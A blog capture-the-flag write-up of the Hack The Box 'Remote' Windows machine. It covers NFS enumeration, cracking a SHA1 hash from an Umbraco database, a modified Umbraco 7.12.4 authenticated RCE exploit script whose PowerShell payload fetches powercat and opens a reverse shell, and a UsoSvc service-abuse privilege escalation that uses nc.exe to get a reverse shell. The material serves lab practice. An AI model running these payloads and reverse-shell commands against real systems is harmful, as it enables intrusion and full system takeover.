Daniel Cano Merchán - Hacking & Tech

Writeup Hackthebox HTB Remote

0 - Basic info

OS: Windows


1 - Reconnaissance

sudo nmap -sS -sV -sC -O
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-28 18:14 CEST
Nmap scan report for
Host is up (0.039s latency).
Not shown: 993 closed ports
21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd        1-3 (RPC #100005)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-07-28T16:15:33
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.45 seconds

Interesting FTP port 21 with anonymous login activated, RPC with nfs, and port 80 serving a site.

Testing Anonymous FTP login allowed

Connected to
220 Microsoft FTP Service
Name ( anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT.

Nothing useful was inside

Testing shares

sudo showmount -e
Export list for
/site_backups (everyone)
mkdir /tmp/mounted
sudo mount --types nfs  /tmp/mounted
App_Browsers  App_Data  App_Plugins  aspnet_client  bin  Config  css  default.aspx  Global.asax  Media  scripts  Umbraco  Umbraco_Client  Views  Web.config

So we got a backup website, with something called Umbraco, searching Umbraco reports that it is a CMS.


Searching inside the folders there is a interesting file web.config:

      <smtp from="noreply@example.com">
         <network host="" userName="username" password="password" />

So there is a user with with the credentials username/password

Umbraco version:

<add key="umbracoConfigurationStatus" value="7.12.4" />

So the Umbraco version is 7.12.4

2 - Vulnerability Identification

searchsploit umbraco
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                           |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit)                                                                                                                                                      | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution                                                                                                                                               | aspx/webapps/46153.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting                                                                                                                                               | php/webapps/44988.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

So it is a vulnerable version, but it is authenticated and user/pass is needed.

Dumping data

Also inside /App_Data there are intesting files:

cache  Logs  Models  packages  TEMP  umbraco.config  Umbraco.sdf
file Umbraco.sdf 
Umbraco.sdf: data
head Umbraco.sdf 
g����Z�x�������ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32��#���0�▒ A$C=H�DY^`FnyPH���I�� K��PM��
�@▒`Cpr�G��PLUHUH�4�-`��II AEEqDD���|   5!
|p�!p���~!PIEEqDD���|   5!
strings Umbraco.sdf > /home/u915/Escritorio/umbracoDB.txt

cat /home/u915/Escritorio/umbracoDB.txt


Cracking the hash

Interesting hashes:


Focus on the SHA1 because is easy to be cracked:


Using https://md5decrypt.net because i am lazy.

sha1 decoded is:

b8be16afba8c314ad33d812f22a04991b90e2aaa : baconandcheese

so it is:


Testing the credentials

Following the path inside the web backup there is a login page inside

alt text

The credentials works:


3 - Exploit

Using the exploit

searchsploit -m 46153
  Exploit: Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution
      URL: https://www.exploit-db.com/exploits/46153
     Path: /usr/share/exploitdb/exploits/aspx/webapps/46153.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Custom exploit

It is a remote code execution so the goal is to execute a reverse shell this time i used powercat.

The tactic it is to use powershell, with the following arguments to download powercat from my machine which has a python server serving powercat and then use it to connect to my machine on the port 1337

proc.StartInfo.FileName = "powershell.exe"; 
proc.StartInfo.Arguments = "IEX(New-Object System.Net.WebClient).DownloadString('');powercat -c -p 1337 -e cmd";\

# Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Gregory DRAPERI & Hugo BOUTINON
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# CVE: N/A

import requests;

from bs4 import BeautifulSoup;

def print_dict(dico):

# Execute a calc for the PoC
payload = '''<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = ""; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "powershell.exe"; proc.StartInfo.Arguments = "IEX(New-Object System.Net.WebClient).DownloadString('');powercat -c -p 1337 -e cmd";\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ''';

login = "admin@htb.local";
host = "";

# Step 1 - Get Main page
s = requests.session()
url_main =host+"/umbraco/";
r1 = s.get(url_main);

# Step 2 - Process Login
url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin";
loginfo = {"username":login,"password":password};
r2 = s.post(url_login,json=loginfo);

# Step 3 - Go to vulnerable web page
url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx";
r3 = s.get(url_xslt);

soup = BeautifulSoup(r3.text, 'html.parser');
VIEWSTATE = soup.find(id="__VIEWSTATE")['value'];
data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"};

# Step 4 - Launch the attack
r4 = s.post(url_xslt,data=data,headers=headers);


Setting up listeners

Using python with http.server on the port 80 (sudo required) to use the powershell DownloadString

sudo python3 -m http.server 80
Serving HTTP on port 80 ( ... - - [28/Jul/2020 20:00:55] "GET /powercat.ps1 HTTP/1.1" 200 -

And the nc listener:

nc -lvp 1337

Using the exploit and user flag

python exploit.py

The reverse shell sucess with the user REMOTE

Inside the path c:\Users\Public the user flag is available:

c:\Users\Public>type user.txt
type user.txt

4 - Post-Exploitation privilege escalation

Now the mission is to get admin priveleges, to do that it is necesary to enumarate more. After a lot of research i will post only the found vector

c:\inetpub>net user
net user

User accounts for \\

Administrator            DefaultAccount           Guest                    
The command completed with one or more errors.


With powershell, download the powerup script from my machine with python server listening to enumerate the machine

Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Public\Documents> IEX(New-Object Net.WebClient).downloadString('')
IEX(New-Object Net.WebClient).downloadString('')
PS C:\Users\Public\Documents> Invoke-AllChecks

[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...
[*] Checking for unquoted service paths...
[*] Checking service executable and argument permissions...
[*] Checking service permissions...

ServiceName   : UsoSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart    : True

[*] Checking %PATH% for potentially hijackable DLL locations...
[*] Checking for AlwaysInstallElevated registry key...Test-Path : Access is denied
At line:856 char:46
+ ...                  if($ParentPath -and (Test-Path -Path $ParentPath)) {
+                                           ~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Windows\syst...Local\Microsoft:String) [Test-Path], UnauthorizedAc 
    + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.TestPathCommand
[*] Checking for Autologon credentials in registry...
[*] Checking for modifidable registry autoruns and configs...
[*] Checking for modifiable schtask files/configs...
[*] Checking for unattended install files...
UnattendPath : C:\Windows\Panther\Unattend.xml
[*] Checking for encrypted web.config strings...
[*] Checking for encrypted application pool and virtual directory passwords...
[*] Checking for plaintext passwords in McAfee SiteList.xml files....
[*] Checking for cached Group Policy Preferences .xml files....

So there is a service that can be exploitted:

Invoke-ServiceAbuse -Name ‘UsoSvc’ the idea is to use the service to spawn a reverse shell to my machine.

Using UsoSvc

Downloading a nc to generate another reverse shell

Invoke-WebRequest -UseBasicParsing -OutFile nc.exe
PS C:\Users\Public\Documents> Invoke-ServiceAbuse -Name 'UsoSvc' -Command "C:\Users\Public\Documents\nc.exe 1338 -e cmd.exe"
Invoke-ServiceAbuse -Name 'UsoSvc' -Command "C:\Users\Public\Documents\nc.exe 1338 -e cmd.exe"

it does not work as expected using these paths…

Changing port, using another path and setting that path as binpath to execute nc and configuring the service to use the nc.exe downloaded:

sc.exe config usosvc binPath="C:\Windows\Temp\nc.exe 9987 -e powershell.exe"
[SC] ChangeServiceConfig SUCCESS

Stopping the service to force a new startup execution of the service

PS C:\Users\Public\Documents> sc.exe stop usosvc

        TYPE               : 30  WIN32  
        STATE              : 3  STOP_PENDING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x3
        WAIT_HINT          : 0x7530

Setting up a listener

rlwrap nc -nvlp 9987
listening on [any] 9987 ...

Start the service and reverse shell

PS C:\Users\Public\Documents> sc.exe start usosvc
sc.exe start usosvc
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

Seens to have fail but…

connect to [] from (UNKNOWN) [] 49865
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt

Thanks for reading !